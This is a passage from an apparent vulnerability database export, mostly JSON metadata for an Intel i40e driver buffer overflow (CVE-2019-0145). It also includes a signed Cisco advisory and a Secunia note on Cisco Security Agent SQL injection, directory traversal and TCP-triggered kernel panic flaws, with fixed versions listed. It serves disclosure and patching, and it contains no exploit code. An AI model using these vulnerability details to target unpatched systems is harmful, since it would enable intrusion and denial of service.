        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2019-0145",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2019-41462",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "id": "VHN-140176",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-0145",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-0145",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-41462",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-567",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-140176",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Buffer overflow in i40e driver for Intel(R) Ethernet 700 Series Controllers versions before 7.0 may allow an authenticated user to potentially enable an escalation of privilege via local access. Intel Ethernet 700 Series Controllers is a network adapter product from Intel Corporation. An attacker could use this vulnerability to achieve privilege elevation",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-0145",
        "trust": 3.1
      },
      {
        "db": "JVN",
        "id": "JVNVU90354904",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462",
        "trust": 0.6
      },
      {
        "db": "LENOVO",
        "id": "LEN-27715",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "id": "VAR-201911-1636",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      }
    ],
    "trust": 1.22213436
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:23:21.209000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "INTEL-SA-00255",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00255.html"
      },
      {
        "title": "Patch for Intel Ethernet 700 Series Controllers Buffer Overflow Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/191081"
      },
      {
        "title": "Intel Ethernet 700 Series Controllers i40e driver Buffer error vulnerability fix",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=104470"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-0145"
      },
      {
        "trust": 1.7,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00255.html"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-0145"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu90354904/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/intel-ethernet-700-series-controllers-multiple-vulnerabilities-30850"
      },
      {
        "trust": 0.6,
        "url": "https://support.lenovo.com/us/en/product_security/len-27715"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "date": "2019-11-14T00:00:00",
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "date": "2019-11-14T19:15:12.207000",
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "date": "2019-11-12T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2019-41462"
      },
      {
        "date": "2023-02-24T00:00:00",
        "db": "VULHUB",
        "id": "VHN-140176"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      },
      {
        "date": "2023-02-24T18:42:50.847000",
        "db": "NVD",
        "id": "CVE-2019-0145"
      },
      {
        "date": "2020-07-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Intel(R) Ethernet 700 Series Controller Vulnerable to classic buffer overflow",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012095"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "buffer error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-567"
      }
    ],
    "trust": 0.6
  }
}

var-201002-0071
Vulnerability from variot

Unspecified vulnerability in Cisco Security Agent 5.2 before 5.2.0.285, when running on Linux, allows remote attackers to cause a denial of service (kernel panic) via "a series of TCP packets.". The Cisco Security Agent is prone to a denial-of-service vulnerability. This issue is tracked by Cisco Bug ID CSCtb89870. An attacker can exploit this issue to cause the vulnerable computer to crash, denying service to legitimate users. Cisco Security Agent 5.2 for Windows and Linux is vulnerable. Cisco Security Agent adopts behavior-based evaluation criteria to identify and protect servers and terminal computers, instead of relying only on signature matching for analysis and identification, successfully solving the security risks brought by unknown viruses. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Security Agent

Advisory ID: cisco-sa-20100217-csa

Revision 1.0

For Public Release 2010 February 17 1600 UTC (GMT)

+---------------------------------------------------------------------

Summary

The Management Center for Cisco Security Agents is affected by a directory traversal vulnerability and a SQL injection vulnerability. Successful exploitation of the directory traversal vulnerability may allow an authenticated attacker to view and download arbitrary files from the server hosting the Management Center. Successful exploitation of the SQL injection vulnerability may allow an authenticated attacker to execute SQL statements that can cause instability of the product or changes in the configuration. Repeated exploitation could result in a sustained DoS condition.

These vulnerabilities are independent of each other.

Cisco has released free software updates that address these vulnerabilities.

This advisory is posted at:

http://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml

Affected Products

Vulnerable Products +------------------

Cisco Security Agent releases 5.1, 5.2 and 6.0 are affected by the SQL injection vulnerability.

Note: Only the Management Center for Cisco Security Agents is affected by the directory traversal and SQL injection vulnerabilities. The agents installed on user end-points are not affected.

Standalone agents are installed in the following products:

  • Cisco Unified Communications Manager (CallManager)
  • Cisco Conference Connection (CCC)
  • Emergency Responder
  • IPCC Express
  • IPCC Enterprise
  • IPCC Hosted
  • IP Interactive Voice Response (IP IVR)
  • IP Queue Manager
  • Intelligent Contact Management (ICM)
  • Cisco Voice Portal (CVP)
  • Cisco Unified Meeting Place
  • Cisco Personal Assistant (PA)
  • Cisco Unity
  • Cisco Unity Connection
  • Cisco Unity Bridge
  • Cisco Secure ACS Solution Engine
  • Cisco Internet Service Node (ISN)
  • Cisco Security Manager (CSM)

Note: The Sun Solaris version of the Cisco Security Agent is not affected by these vulnerabilities.

No other Cisco products are currently known to be affected by these vulnerabilities.

Management Center for Cisco Security Agents Directory Traversal Vulnerability +----------------------------------------------------------------------------

The Management Center for Cisco Security Agents is affected by a directory traversal vulnerability that may allow an authenticated attacker to view and download arbitrary files from the server that is hosting the Management Center for Cisco Security Agents.

Management Center for Cisco Security Agents SQL Injection Vulnerability +----------------------------------------------------------------------

The Management Center for Cisco Security Agents is also affected by a SQL injection vulnerability that may allow an authenticated attacker to execute SQL statements that can cause the Management Center for Cisco Security Agents to become unstable or modify its configuration. These configuration changes may result in modifications to the security policies of the endpoints. Additionally, an attacker may create, delete, or modify management user accounts that are found in the Management Center for Cisco Security Agents.

Vulnerability Scoring Details

Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at:

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at:

http://intellishield.cisco.com/security/alertmanager/cvss

CSCtd73275 - Directory Traversal in the Management Center for Cisco Security Agents

CVSS Base Score - 6.8

Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - None Availability Impact - None

CVSS Temporal Score - 5.9

Exploitability - High Remediation Level - Official-Fix Report Confidence - Confirmed

CSCtd73290 - Management Center for Cisco Security Agents: SQL Injection

CVSS Base Score - 9

Access Vector - Network Access Complexity - Low Authentication - Single Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete

CVSS Temporal Score - 7.4

Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed

CSCtb89870 - Kernel Panic When Receiving Certain TCP Packets

CVSS Base Score - 7.8

Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact - None Availability Impact - Complete

CVSS Temporal Score - 6.4

Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed

Impact

Successful exploitation of the directory traversal vulnerability may allow an authenticated attacker to view and download arbitrary files from the server that is hosting the Management Center for Cisco Security Agents.

Successful exploitation of the SQL injection vulnerability may allow an authenticated attacker to execute SQL statements that can cause the Management Center for Cisco Security Agents to become unstable or modify its configuration. Repeated exploitation could result in a sustained DoS condition.

Software Versions and Fixes

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

+-----------------------------------------------------+ | | Cisco | First | | | Vulnerability | Security | Fixed | Recommended | | | Agent | Version | Release | | | Release | | | |---------------+----------+------------+-------------| | | 5.1 | Not | Not | | | | vulnerable | vulnerable | |Directory |----------+------------+-------------| | Traversal | 5.2 | Not | Not | | Vulnerability | | vulnerable | vulnerable | | |----------+------------+-------------| | | 6.0 | 6.0.1.132 | 6.0.1.132 | |---------------+----------+------------+-------------| | | 5.1 | 5.1.0.117 | 5.1.0.117 | |SQL Injection |----------+------------+-------------| | Vulnerability | 5.2 | 5.2.0.296 | 5.2.0.296 | | |----------+------------+-------------| | | 6.0 | 6.0.1.132 | 6.0.1.132 | |---------------+----------+------------+-------------| | | 5.1 | Not | 5.1.0.117 | | | | vulnerable | | |Denial of |----------+------------+-------------| | Service | 5.2 | 5.2.0.285 | 5.2.0.296 | |Vulnerability |----------+------------+-------------| | | 6.0 | Not | 6.0.1.132 | | | | vulnerable | | +-----------------------------------------------------+

Cisco CSA software can be downloaded from the following link:

http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278065206

Workarounds

There are no workarounds available to mitigate these vulnerabilities.

Additional mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this Advisory:

http://www.cisco.com/warp/public/707/cisco-amb-20100217-csa.shtml

Obtaining Fixed Software

Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at:

http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html

or as otherwise set forth at Cisco.com Downloads at:

http://www.cisco.com/public/sw-center/sw-usingswc.shtml

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.

Customers with Service Contracts +-------------------------------

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.

Customers using Third Party Support Organizations +------------------------------------------------

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.

Customers without Service Contracts +----------------------------------

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

  • +1 800 553 2447 (toll free from within North America)
  • +1 408 526 7209 (toll call from anywhere in the world)
  • e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to:

http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html

for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.

Exploitation and Public Announcements

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory.

The directory traversal and SQL injection vulnerabilities were discovered and reported to Cisco by Gabriele Giuseppini from Cigital. Cisco PSIRT appreciates the opportunity to work with researchers on security vulnerabilities and welcomes the opportunity to review and assist in product reports. The DoS vulnerability was found during internal testing.

Status of this Notice: FINAL

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.

Distribution

This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

  • cust-security-announce@cisco.com
  • first-bulletins@lists.first.org
  • bugtraq@securityfocus.com
  • vulnwatch@vulnwatch.org
  • cisco@spot.colorado.edu
  • cisco-nsp@puck.nether.net
  • full-disclosure@lists.grok.org.uk
  • comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.

Revision History

+----------------------------------------+ | Revision | | Initial | | 1.0 | 2010-February-17 | public | | | | release. | +----------------------------------------+

Cisco Security Procedures

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at:

http://www.cisco.com/go/psirt -----BEGIN PGP SIGNATURE-----

iD8DBQFLew9U86n/Gc8U/uARAifvAJ9oLuXJY6iy962givBVY7701k4ktACfa3wK O9O+Q4F1alHxm6CIbUIXkUs= =+hka -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

NOTE: This vulnerability affects both managed and standalone versions.

SOLUTION: Update to version 6.0.1.132, 5.1.0.117, or 5.2.0.296: http://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278065206

PROVIDED AND/OR DISCOVERED BY: 1, 2) The vendor credits Gabriele Giuseppini from Cigital. 3) Reported by the vendor.

ORIGINAL ADVISORY: http://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201002-0071",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "security agent",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "security agent",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "5.2.0.285"
      },
      {
        "model": "security agent",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "cisco",
        "version": "5.2"
      },
      {
        "model": "security agent",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5.2.285"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:cisco:security_agent:5.2:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco",
    "sources": [
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-2010-0148",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
